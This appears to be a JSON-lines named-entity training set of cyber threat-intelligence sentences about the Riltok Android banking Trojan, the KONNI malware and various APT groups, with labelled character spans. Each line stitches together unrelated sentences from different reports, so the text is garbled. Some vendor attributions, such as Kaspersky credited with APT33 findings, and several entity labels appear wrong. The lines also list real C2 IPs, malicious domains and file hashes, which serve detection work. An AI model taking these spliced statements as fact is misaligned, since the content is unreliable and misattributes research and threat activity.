{"text": "] ru/4 * * * * * 7 \u201d , containing a link to download the Trojan . Following these reports , Chronicle researchers doubled down on efforts to try to unravel the various campaigns where Winnti was leveraged . Moreover the new version searches for files generated by previous versions .", "spans": [{"start": 92, "end": 101, "label": "Organization"}, {"start": 184, "end": 190, "label": "Organization"}]}
{"text": "Other samples were also noticed , posing as a client of a ticket-finding service or as an app store for Android . Distinct changes to Azazel by the Winnti developers include the addition of a function named \u2018Decrypt2\u2019 , which is used to decode an embedded configuration similar to the core implant . This evolution is illustrated across 4 campaigns : one in 2014 , one in 2016 and finally two in 2017 .", "spans": [{"start": 104, "end": 111, "label": "System"}, {"start": 134, "end": 140, "label": "System"}, {"start": 148, "end": 165, "label": "Organization"}]}
{"text": "It was late 2018 when Riltok climbed onto the international stage . Zebrocy activity initiates with spearphishing operations delivering various target profilers and downloaders without the use of any 0day exploits . The decoy document of the 2 last campaigns suggests that the targets are public organisations .", "spans": [{"start": 22, "end": 28, "label": "Malware"}, {"start": 68, "end": 75, "label": "Organization"}, {"start": 200, "end": 213, "label": "Vulnerability"}]}
{"text": "The cybercriminals behind it kept the same masking and distribution methods , using names and icons imitating those of popular free ad services . We will see more from Zebrocy into 2019 on government and military related organizations . Both documents contained email addresses , phone numbers and contacts of members of official organizations such as United Nations , UNICEF , and Embassies linked to North Korea .", "spans": [{"start": 168, "end": 175, "label": "Organization"}, {"start": 189, "end": 199, "label": "Organization"}, {"start": 204, "end": 212, "label": "Organization"}, {"start": 262, "end": 267, "label": "System"}, {"start": 321, "end": 343, "label": "Organization"}, {"start": 352, "end": 366, "label": "Organization"}, {"start": 369, "end": 375, "label": "Organization"}, {"start": 382, "end": 391, "label": "Organization"}]}
{"text": "In November 2018 , a version of the Trojan for the English market appeared in the shape of Gumtree.apk . The PowerShell script will look at the architecture of the system to check which malicious DLL files should be downloaded . In this campaign , the dropper filename was beauty.scr .", "spans": [{"start": 91, "end": 102, "label": "Indicator"}, {"start": 109, "end": 126, "label": "System"}, {"start": 186, "end": 205, "label": "Malware"}, {"start": 273, "end": 283, "label": "Indicator"}]}
{"text": "The SMS message with a link to a banker looked as follows : \u201c % USERNAME % , i send you prepayment gumtree [ . In the same year , Silence conducted DDoS attacks using the Perl IRC bot and public IRC chats to control Trojans . Based on the compilation date of the two binaries , this campaign took place in September 2014 .", "spans": [{"start": 99, "end": 110, "label": "Indicator"}, {"start": 130, "end": 137, "label": "Organization"}, {"start": 171, "end": 183, "label": "System"}, {"start": 188, "end": 198, "label": "System"}]}
{"text": "] cc/3 * * * * * 1 \u201d . \bThe FBI issued a rare bulletin admitting that a group named APT6 hacked into US government computer systems as far back as 2011 and for years stole sensitive data . Once executed , two files were dropped on the targeted system : a decoy document (a picture) and a fake svchost.exe binary .", "spans": [{"start": 28, "end": 31, "label": "Organization"}, {"start": 72, "end": 77, "label": "Organization"}, {"start": 84, "end": 88, "label": "Organization"}, {"start": 101, "end": 114, "label": "Organization"}, {"start": 293, "end": 304, "label": "Indicator"}]}
{"text": "Italian ( Subito.apk ) and French ( Leboncoin.apk ) versions appeared shortly afterwards in January 2019 . \bFireEye iSIGHT Intelligence believes that APT37 is aligned with the activity publicly reported as Scarcruft and Group123 . Both files were stored in \"C:\\Windows\" .", "spans": [{"start": 10, "end": 20, "label": "Indicator"}, {"start": 36, "end": 49, "label": "Indicator"}, {"start": 107, "end": 122, "label": "Organization"}, {"start": 150, "end": 155, "label": "Organization"}, {"start": 206, "end": 215, "label": "Organization"}, {"start": 220, "end": 228, "label": "Organization"}, {"start": 257, "end": 269, "label": "Indicator"}]}
{"text": "The messages looked as follows : \u201c % USERNAME % , ti ho inviato il soldi sul subito subito-a [ . \bTrend Micro attributes this activity to MuddyWater , an Iran-nexus actor that has been active since at least May 2017 . The fake svchost binary is the KONNI malware .", "spans": [{"start": 84, "end": 96, "label": "Indicator"}, {"start": 97, "end": 109, "label": "Organization"}, {"start": 138, "end": 148, "label": "Organization"}, {"start": 165, "end": 170, "label": "Organization"}, {"start": 249, "end": 254, "label": "Malware"}]}
{"text": "] pw/6 * * * * * 5 \u201d ( It . \bFireEye assess that the actors employing this latest Flash zero-day are a suspected North Korean group we track as TEMP.Reaper . The first task of the malware is to generate an ID to identify the infected system .", "spans": [{"start": 28, "end": 36, "label": "Organization"}, {"start": 53, "end": 59, "label": "Organization"}, {"start": 144, "end": 155, "label": "Organization"}]}
{"text": ") \u201c % USERNAME % , ti ho inviato il pagamento subitop [ . FireEye has observed other suspected North Korean threat groups such as TEMP.Hermit employ wiper malware in disruptive attacks . This ID is generated based on the installation date of the system .", "spans": [{"start": 46, "end": 57, "label": "Indicator"}, {"start": 58, "end": 65, "label": "Organization"}, {"start": 130, "end": 141, "label": "Organization"}]}
{"text": "] pw/4 * * * * * 7 \u201d ( It . On Nov14 , 2017 , FireEye observed APT34 using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East . The second task of malware is to ping the CC and get orders .", "spans": [{"start": 46, "end": 53, "label": "Organization"}, {"start": 63, "end": 68, "label": "Organization"}, {"start": 111, "end": 124, "label": "Vulnerability"}, {"start": 137, "end": 160, "label": "Organization"}]}
{"text": ") \u201c % USERNAME % , je vous ai envoy\u00e9 un prepaiement m-leboncoin [ . Kaspersky reveals that APT33 is a capable group that has carried out cyber espionage operations since at least 2013 . The malware includes 2 domains: phpschboy.prohosts.org , jams481.site.bz .", "spans": [{"start": 52, "end": 67, "label": "Indicator"}, {"start": 68, "end": 77, "label": "Organization"}, {"start": 91, "end": 96, "label": "Organization"}, {"start": 110, "end": 115, "label": "Organization"}, {"start": 218, "end": 240, "label": "Indicator"}, {"start": 243, "end": 258, "label": "Indicator"}]}
{"text": "] top/7 * * * * * 3 \u201d ( Fr . APT33 is the only group that Kaspersky has observed use the DROPSHOT dropper . The developer used the Microsoft Winsocks API to handle the network connection .", "spans": [{"start": 29, "end": 34, "label": "Organization"}, {"start": 58, "end": 67, "label": "Organization"}, {"start": 89, "end": 105, "label": "System"}, {"start": 131, "end": 153, "label": "System"}]}
{"text": ") \u201c % USERNAME % , j \u2019 ai fait l \u2019 avance ( suivi d \u2019 un lien ) : leboncoin-le [ . The cyber espionage group APT32 heavily obfuscates their backdoors and scripts , and Mandiant consultants observed APT32 implement additional command argument obfuscation in April 2017 . Surprisingly , this isn't the easiest or the most efficient technical choice for HTTP connection .", "spans": [{"start": 66, "end": 82, "label": "Indicator"}, {"start": 109, "end": 114, "label": "Organization"}, {"start": 140, "end": 149, "label": "System"}, {"start": 154, "end": 161, "label": "System"}, {"start": 198, "end": 203, "label": "Organization"}, {"start": 351, "end": 355, "label": "Indicator"}]}
{"text": "] com/8 * * * * * 9 \u201d ( Fr . In all Mandiant investigations to date where the CARBANAK backdoor has been discovered , the activity has been attributed to the FIN7 threat group . The malware samples we analysed connected to only one URI: <c2-domain>/login.php .", "spans": [{"start": 36, "end": 44, "label": "Organization"}, {"start": 158, "end": 162, "label": "Organization"}, {"start": 237, "end": 258, "label": "Indicator"}]}
{"text": ") Let \u2019 s take a more detailed look at how this banking Trojan works . Kaspersky released a similar report about the same group under the name Carbanak in February 2015 . This version of KONNI is not designed to execute code on the infected system .", "spans": [{"start": 71, "end": 80, "label": "Organization"}, {"start": 122, "end": 127, "label": "Organization"}, {"start": 143, "end": 151, "label": "Organization"}, {"start": 187, "end": 192, "label": "Malware"}]}
{"text": "Infection The user receives an SMS with a malicious link pointing to a fake website simulating a popular free ad service . FireEye assesses that APT32 leverages a unique suite of fully-featured malware . The purpose is to be executed only once and steal data on the infected system , here are the main features : Keyloggers , Clipboard stealer , Firefox profiles and cookies stealer , Chrome profiles and cookies stealer , Opera profiles and cookies stealer .", "spans": [{"start": 123, "end": 130, "label": "Organization"}, {"start": 346, "end": 353, "label": "Organization"}, {"start": 385, "end": 391, "label": "Organization"}, {"start": 423, "end": 428, "label": "Organization"}]}
{"text": "There , they are prompted to download a new version of the mobile app , under which guise the Trojan is hidden . FireEye has observed APT32 targeting foreign corporations with a vested interest in Vietnam\u2019s manufacturing , consumer products , and hospitality sectors . The name of the .scr file was directly linked to tension between North Korea and USA in March 2016 more information .", "spans": [{"start": 113, "end": 120, "label": "Organization"}, {"start": 134, "end": 139, "label": "Organization"}, {"start": 197, "end": 220, "label": "Organization"}, {"start": 223, "end": 240, "label": "Organization"}, {"start": 247, "end": 258, "label": "Organization"}, {"start": 285, "end": 289, "label": "Indicator"}]}
{"text": "To be installed , it needs the victim to allow installation of apps from unknown sources in the device settings . The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information on these backdoor families based on Mandiant investigations of APT32 intrusions . Based on the compilation dates of the binaries , the campaign took place in the same period .", "spans": [{"start": 118, "end": 125, "label": "Organization"}, {"start": 126, "end": 132, "label": "Organization"}, {"start": 229, "end": 237, "label": "Organization"}, {"start": 256, "end": 261, "label": "Organization"}]}
{"text": "During installation , Riltok asks the user for permission to use special features in AccessibilityService by displaying a fake warning : If the user ignores or declines the request , the window keeps opening ad infinitum . FireEye assesses that APT32 is a cyber espionage group aligned with Vietnamese government interests . An interesting fact : the dropped library was compiled in 2014 and appears in our telemetry in August 2015 .", "spans": [{"start": 22, "end": 28, "label": "Malware"}, {"start": 223, "end": 230, "label": "Organization"}, {"start": 245, "end": 250, "label": "Organization"}, {"start": 291, "end": 301, "label": "Organization"}, {"start": 302, "end": 312, "label": "Organization"}]}
{"text": "After obtaining the desired rights , the Trojan sets itself as the default SMS app ( by independently clicking Yes in AccessibilityService ) , before vanishing from the device screen . In May and June 2017 , FireEye has associated this campaign with APT19 , a group that we assess is composed of freelancers , with some degree of sponsorship by the Chinese government . Indicating that this library was probably used in another campaign .", "spans": [{"start": 208, "end": 215, "label": "Organization"}, {"start": 250, "end": 255, "label": "Organization"}, {"start": 260, "end": 265, "label": "Organization"}, {"start": 349, "end": 367, "label": "Organization"}]}
{"text": "After enabling AccessibilityService , the malware sets itself as the default SMS app Now installed and having obtained the necessary permissions from the user , Riltok contacts its C & C server . APT10 is a Chinese cyber espionage group that FireEye has tracked since 2009 . The .scr file contains 2 Office documents .", "spans": [{"start": 161, "end": 167, "label": "Malware"}, {"start": 196, "end": 201, "label": "Organization"}, {"start": 242, "end": 249, "label": "Organization"}, {"start": 279, "end": 283, "label": "Indicator"}, {"start": 300, "end": 306, "label": "System"}]}
{"text": "In later versions , when it starts , the Trojan additionally opens a phishing site in the browser that simulates a free ad service so as to dupe the user into entering their login credentials and bank card details . In addition to the spear phishes , FireEye ISIGHT Intelligence has observed APT10 accessing victims through global service providers . The first document was in English and a second in Russian .", "spans": [{"start": 251, "end": 278, "label": "Organization"}, {"start": 292, "end": 297, "label": "Organization"}]}
{"text": "The entered data is forwarded to the cybercriminals . FireEye\u2019s visibility into the operations of APT28 \u2013 a group we believe the Russian government sponsors \u2013 has given us insight into some of the government\u2019s targets , as well as its objectives and the activities designed to further them . In the sample only the English version can be displayed to the user (that is hardcoded in the sample) .", "spans": [{"start": 54, "end": 63, "label": "Organization"}, {"start": 98, "end": 103, "label": "Organization"}, {"start": 129, "end": 147, "label": "Organization"}]}
{"text": "Phishing page from the French version of the Trojan Communication with C & C Riltok actively communicates with its C & C server . FireEye has tracked and profiled APT28 group through multiple investigations , endpoint and network detections , and continuous monitoring . The Russian document is not used by the sample , we assume that the author of the malware forgot to remove the resource containing the Russia decoy document .", "spans": [{"start": 77, "end": 83, "label": "Malware"}, {"start": 130, "end": 137, "label": "Organization"}, {"start": 163, "end": 168, "label": "Organization"}]}
{"text": "First off , it registers the infected device in the administrative panel by sending a GET request to the relative address gate.php ( in later versions gating.php ) with the ID ( device identifier generated by the setPsuedoID function in a pseudo-random way based on the device IMEI ) and screen ( shows if the device is active , possible values are \u201c on \u201d , \u201c off \u201d , \u201c none \u201d ) parameters . In April 2015 , FireEye uncovered the malicious efforts of APT30 , a suspected China-based threat group . The malware author changed the malware architecture , this version is divided in two binaries: conhote.dll , winnit.exe .", "spans": [{"start": 122, "end": 130, "label": "Indicator"}, {"start": 151, "end": 161, "label": "Indicator"}, {"start": 408, "end": 415, "label": "Organization"}, {"start": 451, "end": 456, "label": "Organization"}, {"start": 593, "end": 604, "label": "Indicator"}, {"start": 607, "end": 617, "label": "Indicator"}]}
{"text": "Then , using POST requests to the relative address report.php , it sends data about the device ( IMEI , phone number , country , mobile operator , phone model , availability of root rights , OS version ) , list of contacts , list of installed apps , incoming SMS , and other information . FireEye iSIGHT Intelligence has been tracking a pair of cybercriminals that we refer to as the Vendetta Brothers . Another difference is the directory where the files are dropped , it's no longer C:\\Windows but rather the local setting of the current user (%USERPROFILE%\\Local Settings\\winnit\\winnit.exe) .", "spans": [{"start": 51, "end": 61, "label": "Indicator"}, {"start": 289, "end": 303, "label": "Organization"}, {"start": 384, "end": 401, "label": "Organization"}, {"start": 485, "end": 495, "label": "Indicator"}, {"start": 545, "end": 593, "label": "Indicator"}]}
{"text": "From the server , the Trojan receives commands ( for example , to send SMS ) and changes in the configuration . Google and Microsoft have already confirmed the Russian hacker group APT28 used a Flash vulnerability CVE-2016-7855 along with this kernel privilege escalation flaw to perform a targeted attack . Thanks to this modification , the malware can be executed with a non-administrator account .", "spans": [{"start": 112, "end": 118, "label": "Organization"}, {"start": 123, "end": 132, "label": "Organization"}, {"start": 181, "end": 186, "label": "Organization"}, {"start": 214, "end": 227, "label": "Vulnerability"}]}
{"text": "Trojan anatomy The family was named Riltok after the librealtalk-jni.so library contained in the APK file of the Trojan . McAfee concludes that some groups\u2014and especially the Poetry Group \u2014have shifted tactics to use Citadel in ways other than what it was originally intended for . The .dll file is executed by the .exe file .", "spans": [{"start": 36, "end": 42, "label": "Malware"}, {"start": 53, "end": 71, "label": "Indicator"}, {"start": 122, "end": 128, "label": "Organization"}, {"start": 182, "end": 187, "label": "Organization"}, {"start": 286, "end": 290, "label": "Indicator"}, {"start": 315, "end": 319, "label": "Indicator"}]}
{"text": "The library includes such operations as : Get address of cybercriminal C & C server Get configuration file with web injects from C & C , as well as default list of injects Scan for app package names that generated AccessibilityEvent events in the list of known banking/antivirus/other popular apps Set malware as default SMS app Get address of the phishing page that opens when the app runs , and others getStartWebUrl function \u2013 get address of phishing page The configuration file contains a list of injects for mobile banking apps \u2013 links to phishing pages matching the mobile McAfee Advanced Threat research determines with confidence that Lazarus is the threat group behind this attack for the following reasons:Contacts an IP address / domain that was used to host a malicious document from a Lazarus previous campaign in 2017 . In this version , a shortcut is created in order to launch winnit.exe in the following path %USERPROFILE%\\Start Menu\\Programs\\Startup\\Anti virus service.lnk .", "spans": [{"start": 579, "end": 585, "label": "Organization"}, {"start": 643, "end": 650, "label": "Organization"}, {"start": 772, "end": 790, "label": "Malware"}, {"start": 798, "end": 805, "label": "Organization"}, {"start": 893, "end": 903, "label": "Indicator"}, {"start": 926, "end": 990, "label": "Indicator"}]}
{"text": "banking app used by the user . In November 2017 , Talos observed the Group123 , which included a new version of ROKRAT being used in the latest wave of attacks . As you can see the attacker has went to great lengths to disguise his service as a legitimate Antivirus Service by using the name 'Anti virus service.lnk' .", "spans": [{"start": 50, "end": 55, "label": "Organization"}, {"start": 69, "end": 77, "label": "Organization"}, {"start": 256, "end": 273, "label": "System"}, {"start": 292, "end": 316, "label": "Indicator"}]}
{"text": "In most so-called Western versions of the Trojan , the package names in the default configuration file are erased . In addition to TALOS investigation on KONNI , on July 18 2017 , BitDefender released a whitepaper on DarkHotel . This is of course simple but often it can be enough for a user to miss something malicious by name .", "spans": [{"start": 131, "end": 136, "label": "Organization"}, {"start": 217, "end": 226, "label": "Organization"}]}
{"text": "Sample configuration file of the Trojan Through AccessibilityService , the malware monitors AccessibilityEvent events . According to security 360 Threat Intelligence Center , Goldmouse was observed deploying the nebulous njRAT backdoor . As in the previous version , the ID of the infected system is generated with exactly the same method .", "spans": [{"start": 142, "end": 172, "label": "Organization"}, {"start": 221, "end": 235, "label": "Malware"}]}
{"text": "Depending on which app ( package name ) generated the event , Riltok can : Open a fake Google Play screen requesting bank card details Open a fake screen or phishing page in a browser ( inject ) mimicking the screen of the relevant mobile banking app and requesting user/bank card details Minimize the app ( for example , antivirus applications or device security settings ) Additionally , the Trojan can hide notifications from certain banking apps . ESET has also reported PowerShell scripts being used by Turla to provide direct , in-memory loading and execution of malware . The C2 is different and the analysed version this time only contains a single domain: dowhelsitjs.netau.net .", "spans": [{"start": 62, "end": 68, "label": "Malware"}, {"start": 87, "end": 98, "label": "System"}, {"start": 452, "end": 456, "label": "Organization"}, {"start": 475, "end": 493, "label": "System"}, {"start": 508, "end": 513, "label": "Organization"}, {"start": 583, "end": 585, "label": "System"}, {"start": 665, "end": 686, "label": "Indicator"}]}
{"text": "List of package names of apps on events from which the Trojan opens a fake Google Play window ( for the Russian version of the Trojan ) Example of Trojan screen overlapping other apps When bank card details are entered in the fake window , Riltok performs basic validation checks : card validity period , number checksum , CVC length , whether the number is in the denylist sewn into the Trojan code : Examples of phishing pages imitating mobile banks At the time of writing , the functionality of most of the Western versions of Riltok Additionally Kaspersky identified a new backdoor that we attribute with medium confidence to Turla . In this version , the developer used a different API , the Wininet API which make more sense for Web requests .", "spans": [{"start": 75, "end": 86, "label": "System"}, {"start": 550, "end": 559, "label": "Organization"}, {"start": 577, "end": 585, "label": "Malware"}, {"start": 630, "end": 635, "label": "Organization"}, {"start": 697, "end": 708, "label": "System"}]}
{"text": "was somewhat pared down compared to the Russian one . Researchers at Symantec suspect that Turla used the hijacked network to attack a Middle Eastern government . Moreover the C2 infrastructure evolved too , more .php files are available through the web hosting: <c2-domain>/login.php <c2-domain>/upload.php <c2-domain>/download.php .", "spans": [{"start": 69, "end": 77, "label": "Organization"}, {"start": 150, "end": 160, "label": "Organization"}, {"start": 176, "end": 178, "label": "System"}, {"start": 213, "end": 217, "label": "Indicator"}, {"start": 263, "end": 284, "label": "Indicator"}, {"start": 285, "end": 307, "label": "Indicator"}, {"start": 308, "end": 332, "label": "Indicator"}]}
{"text": "For example , the default configuration file with injects is non-operational , and the malware contains no fake built-in windows requesting bank card details . Symantec researchers have uncovered evidence that the Waterbug APT group has conducted a hostile takeover of an attack platform . This version includes the stealer features mentioned in the previous version and additionally Remote Administration Tool features such as file uploading/download and arbitrary command execution .", "spans": [{"start": 160, "end": 168, "label": "Organization"}, {"start": 214, "end": 222, "label": "Organization"}, {"start": 384, "end": 410, "label": "System"}]}
{"text": "Conclusion Threats are better prevented than cured , so do not follow suspicious links in SMS , and be sure to install apps only from official sources and check what permissions you are granting during installation . Researchers at the Microstep Intelligence Bureau have published a report on targeted attacks on the Ukrainian government that they attribute to the Gamaredon threat actor . The library is only used to perform keylogging and clipboard stealing .", "spans": [{"start": 236, "end": 265, "label": "Organization"}, {"start": 317, "end": 337, "label": "Organization"}, {"start": 365, "end": 374, "label": "Organization"}]}
{"text": "As Riltok shows , cybercriminals can apply the same methods of infection to victims in different countries with more or less the same success . Kaspersky found an active campaign by a Chinese APT group we call SixLittleMonkeys that uses a new version of the Microcin Trojan and a RAT that we call HawkEye as a last stager . Indeed , the malware author moved this part of the code from the core of the malware to a library .", "spans": [{"start": 3, "end": 9, "label": "Malware"}, {"start": 144, "end": 153, "label": "Organization"}, {"start": 210, "end": 226, "label": "Organization"}, {"start": 258, "end": 273, "label": "System"}, {"start": 280, "end": 283, "label": "System"}]}
{"text": "Kaspersky products detect the above-described threat with the verdict Trojan-Banker.AndroidOS.Riltok . Trend Micro has previously reported the use of this malware in targeted attacks by the BlackTech group , primarily focused on cyber-espionage in Asia . An interesting element is that the malware looks for filenames created with the previous version of KONNI .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 70, "end": 100, "label": "Indicator"}, {"start": 103, "end": 114, "label": "Organization"}, {"start": 190, "end": 199, "label": "Organization"}, {"start": 355, "end": 360, "label": "Malware"}]}
{"text": "IoCs C & C 100.51.100.00 108.62.118.131 172.81.134.165 172.86.120.207 185.212.128.152 185.212.128.192 185.61.000.108 185.61.138.108 185.61.138.37 188.209.52.101 5.206.225.57 alr992.date avito-app.pw backfround2.pw background1.xyz blacksolider93.com blass9g087.com brekelter2.com broplar3hf.xyz buy-youla.ru LuckyMouse activity detected by Palo Alto involved the attackers installing web shells on SharePoint servers to compromise government organizations in the Middle East . This implies that the malware targeted the same people as the previous version and they are designed to work together .", "spans": [{"start": 11, "end": 24, "label": "Indicator"}, {"start": 25, "end": 39, "label": "Indicator"}, {"start": 40, "end": 54, "label": "Indicator"}, {"start": 55, "end": 69, "label": "Indicator"}, {"start": 70, "end": 85, "label": "Indicator"}, {"start": 86, "end": 101, "label": "Indicator"}, {"start": 102, "end": 116, "label": "Indicator"}, {"start": 117, "end": 131, "label": "Indicator"}, {"start": 132, "end": 145, "label": "Indicator"}, {"start": 146, "end": 160, "label": "Indicator"}, {"start": 161, "end": 173, "label": "Indicator"}, {"start": 174, "end": 185, "label": "Indicator"}, {"start": 186, "end": 198, "label": "Indicator"}, {"start": 199, "end": 213, "label": "Indicator"}, {"start": 214, "end": 229, "label": "Indicator"}, {"start": 230, "end": 248, "label": "Indicator"}, {"start": 249, "end": 263, "label": "Indicator"}, {"start": 264, "end": 278, "label": "Indicator"}, {"start": 279, "end": 293, "label": "Indicator"}, {"start": 294, "end": 306, "label": "Indicator"}, {"start": 307, "end": 317, "label": "Organization"}, {"start": 339, "end": 348, "label": "Organization"}, {"start": 383, "end": 393, "label": "System"}, {"start": 430, "end": 454, "label": "Organization"}]}
{"text": "cd78cg210xy0.com copsoiteess.com farmatefc93.org firstclinsop.com holebrhuhh3.com holebrhuhh45.com karambga3j.net le22999a.pw leboncoin-bk.top leboncoin-buy.pw leboncoin-cz.info leboncoin-f.pw leboncoin-jp.info leboncoin-kp.top leboncoin-ny.info leboncoin-ql.top leboncoin-tr.info Talos published its analysis of the BlackWater campaign , related to MuddyWater group . The malware internally uses the following files : solhelp.ocx sultry.ocx helpsol.ocx psltre.ocx screentmp.tmp (log file of the keylogger) spadmgr.ocx apsmgrd.ocx wpg.db .", "spans": [{"start": 0, "end": 16, "label": "Indicator"}, {"start": 17, "end": 32, "label": "Indicator"}, {"start": 33, "end": 48, "label": "Indicator"}, {"start": 49, "end": 65, "label": "Indicator"}, {"start": 66, "end": 81, "label": "Indicator"}, {"start": 82, "end": 98, "label": "Indicator"}, {"start": 99, "end": 113, "label": "Indicator"}, {"start": 114, "end": 125, "label": "Indicator"}, {"start": 126, "end": 142, "label": "Indicator"}, {"start": 143, "end": 159, "label": "Indicator"}, {"start": 160, "end": 177, "label": "Indicator"}, {"start": 178, "end": 192, "label": "Indicator"}, {"start": 193, "end": 210, "label": "Indicator"}, {"start": 211, "end": 227, "label": "Indicator"}, {"start": 228, "end": 245, "label": "Indicator"}, {"start": 246, "end": 262, "label": "Indicator"}, {"start": 263, "end": 280, "label": "Indicator"}, {"start": 281, "end": 286, "label": "Organization"}, {"start": 350, "end": 360, "label": "Organization"}, {"start": 419, "end": 430, "label": "Indicator"}, {"start": 431, "end": 441, "label": "Indicator"}, {"start": 442, "end": 453, "label": "Indicator"}, {"start": 454, "end": 464, "label": "Indicator"}, {"start": 465, "end": 478, "label": "Indicator"}, {"start": 507, "end": 518, "label": "Indicator"}, {"start": 519, "end": 530, "label": "Indicator"}, {"start": 531, "end": 537, "label": "Indicator"}]}
{"text": "myyoula.ru sell-avito.ru sell-youla.ru sentel8ju67.com subito-li.pw subitop.pw web-gumtree.com whitehousejosh.com whitekalgoy3.com youlaprotect.ru Examples of malware 0497b6000a7a23e9e9b97472bc2d3799caf49cbbea1627ad4d87ae6e0b7e2a98 417fc112cd0610cc8c402742b0baab0a086b5c4164230009e11d34fdeee7d3fa Trend Micro also reported MuddyWater\u2019s use of a new multi-stage PowerShell-based backdoor called POWERSTATS v3 . In this campaign , the malware author uses the following name: Pyongyang Directory Group email April 2017 RC_Office_Coordination_Associate.scr. The decoy document shown after infection is an Office document containing email addresses , phone numbers and contacts of members of official organizations such as the United Nations , UNICEF , Embassies linked to North Korea .", "spans": [{"start": 0, "end": 10, "label": "Indicator"}, {"start": 11, "end": 24, "label": "Indicator"}, {"start": 25, "end": 38, "label": "Indicator"}, {"start": 39, "end": 54, "label": "Indicator"}, {"start": 55, "end": 67, "label": "Indicator"}, {"start": 68, "end": 78, "label": "Indicator"}, {"start": 79, "end": 94, "label": "Indicator"}, {"start": 95, "end": 113, "label": "Indicator"}, {"start": 114, "end": 130, "label": "Indicator"}, {"start": 131, "end": 146, "label": "Indicator"}, {"start": 167, "end": 231, "label": "Indicator"}, {"start": 232, "end": 296, "label": "Indicator"}, {"start": 297, "end": 308, "label": "Organization"}, {"start": 323, "end": 335, "label": "Organization"}, {"start": 394, "end": 407, "label": "Malware"}, {"start": 516, "end": 553, "label": "Indicator"}, {"start": 601, "end": 607, "label": "System"}, {"start": 628, "end": 633, "label": "System"}, {"start": 687, "end": 709, "label": "Organization"}, {"start": 722, "end": 736, "label": "Organization"}, {"start": 739, "end": 745, "label": "Organization"}, {"start": 748, "end": 757, "label": "Organization"}]}
{"text": "54594edbe9055517da2836199600f682dee07e6b405c6fe4b476627e8d184bfe 6e995d68c724f121d43ec2ff59bc4e536192360afa3beaec5646f01094f0b745 bbc268ca63eeb27e424fec1b3976bab550da304de18e29faff94d9057b1fa25a dc3dd9d75120934333496d0a4100252b419ee8fcdab5d74cf343bcb0306c9811 Regarding other groups , Kaspersky discovered new activity related to ZooPark , a cyber-espionage threat actor that has focused mainly on stealing data from Android devices . The .scr files drops two files: an executable and a library .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 129, "label": "Indicator"}, {"start": 130, "end": 194, "label": "Indicator"}, {"start": 195, "end": 259, "label": "Indicator"}, {"start": 276, "end": 282, "label": "Organization"}, {"start": 285, "end": 294, "label": "Organization"}, {"start": 330, "end": 337, "label": "Organization"}, {"start": 439, "end": 443, "label": "Indicator"}]}
{"text": "e3f77ff093f322e139940b33994c5a57ae010b66668668dc4945142a81bcc049 ebd0a8043434edac261cb25b94f417188a5c0d62b5dd4033f156b890d150a4c5 f51a27163cb0ddd08caa29d865b9f238848118ba2589626af711330481b352df Tracking down the developer of Android adware affecting Recorded Future published an analysis of the infrastructure built by APT33 (aka Elfin) to target Saudi organizations . As in the previous version , the persistence is achieved by a Windows shortcut (in this case adobe distillist.lnk ) .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 129, "label": "Indicator"}, {"start": 130, "end": 194, "label": "Indicator"}, {"start": 226, "end": 233, "label": "System"}, {"start": 251, "end": 266, "label": "Organization"}, {"start": 320, "end": 325, "label": "Organization"}, {"start": 432, "end": 439, "label": "System"}, {"start": 469, "end": 483, "label": "Indicator"}]}
{"text": "millions of users 24 Oct 2019 - 11:30AM We detected a large adware campaign running for about a year , with the involved apps installed eight million times from Google Play alone . Early in Q2 , Kaspersky identified an interesting Lazarus attack targeting a mobile gaming company in South Korea that we believe was aimed at stealing application source code . Contrary to the previous version , the developers moved the core of malware to the library .", "spans": [{"start": 161, "end": 172, "label": "System"}, {"start": 195, "end": 204, "label": "Organization"}, {"start": 231, "end": 238, "label": "Organization"}, {"start": 258, "end": 271, "label": "Organization"}]}
{"text": "We identified 42 apps on Google Play as belonging to the campaign , which had been running since July 2018 . In a recent campaign , Kaspersky observed ScarCruft using a multi-stage binary to infect several victims and ultimately install a final payload known as ROKRAT \u2013 a cloud service-based backdoor . The executable performs the following tasks: If the system is a 64-bit version of Windows , it downloads and executes a specific 64-bit version of the malware thanks to a powershell script .", "spans": [{"start": 25, "end": 36, "label": "System"}, {"start": 132, "end": 141, "label": "Organization"}, {"start": 151, "end": 160, "label": "Organization"}, {"start": 262, "end": 268, "label": "System"}, {"start": 386, "end": 393, "label": "System"}, {"start": 475, "end": 485, "label": "System"}]}
{"text": "Of those , 21 were still available at the time of discovery . ESET recently analyzed a new Mac OS sample from the OceanLotus group that had been uploaded to VirusTotal . Loading the dropped library .", "spans": [{"start": 62, "end": 66, "label": "Organization"}, {"start": 98, "end": 104, "label": "Malware"}, {"start": 114, "end": 124, "label": "Organization"}]}
{"text": "We reported the apps to the Google security team and they were swiftly removed . The threat actor behind the campaign , which Kaspersky believes to be the PLATINUM APT group , uses an elaborate , previously unseen , steganographic technique to conceal communication . The library contains the same features as the previous version as well as new ones .", "spans": [{"start": 92, "end": 97, "label": "Organization"}, {"start": 126, "end": 135, "label": "Organization"}, {"start": 155, "end": 163, "label": "Organization"}]}
{"text": "However , the apps are still available in third-party app stores . FireEye defined APT40 as the Chinese state-sponsored threat actor previously reported as TEMP.Periscope , Leviathan and TEMP.Jumper . This version of KONNI is the most advanced with better coding .", "spans": [{"start": 67, "end": 74, "label": "Organization"}, {"start": 83, "end": 88, "label": "Organization"}, {"start": 156, "end": 170, "label": "Organization"}, {"start": 173, "end": 182, "label": "Organization"}, {"start": 187, "end": 198, "label": "Organization"}, {"start": 217, "end": 222, "label": "Malware"}]}
{"text": "ESET detects this adware , collectively , as Android/AdDisplay.Ashas . In January , Kaspersky identified new activity by the Transparent Tribe APT group aka PROJECTM and MYTHIC LEOPARD , a threat actor with interests aligned with Pakistan that has shown a persistent focus on Indian military targets . The malware configuration contains one Command and Control: pactchfilepacks.net23.net .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 45, "end": 68, "label": "Malware"}, {"start": 84, "end": 93, "label": "Organization"}, {"start": 157, "end": 165, "label": "Organization"}, {"start": 170, "end": 184, "label": "Organization"}, {"start": 283, "end": 291, "label": "Organization"}, {"start": 362, "end": 387, "label": "Indicator"}]}
